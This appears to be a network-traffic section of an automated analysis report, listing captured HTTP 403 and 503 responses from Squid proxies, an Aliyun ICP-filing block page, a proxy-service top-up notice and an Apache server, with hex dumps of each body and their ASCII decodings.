Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:50 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.20Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:50 GMTContent-Type: text/html;charset=utf-8Content-Length: 3661X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from ezproxies.comX-Cache-Lookup: NONE from ezproxies.com:58378Via: 1.1 ezproxies.com (squid/3.5.20)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/4.6Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:50 GMTContent-Type: text/html;charset=utf-8Content-Length: 3773X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 39 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:50 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.20Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:50 GMTContent-Type: text/html;charset=utf-8Content-Length: 3661X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from ezproxies.comX-Cache-Lookup: NONE from ezproxies.com:58378Via: 1.1 ezproxies.com (squid/3.5.20)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:50 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 281Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 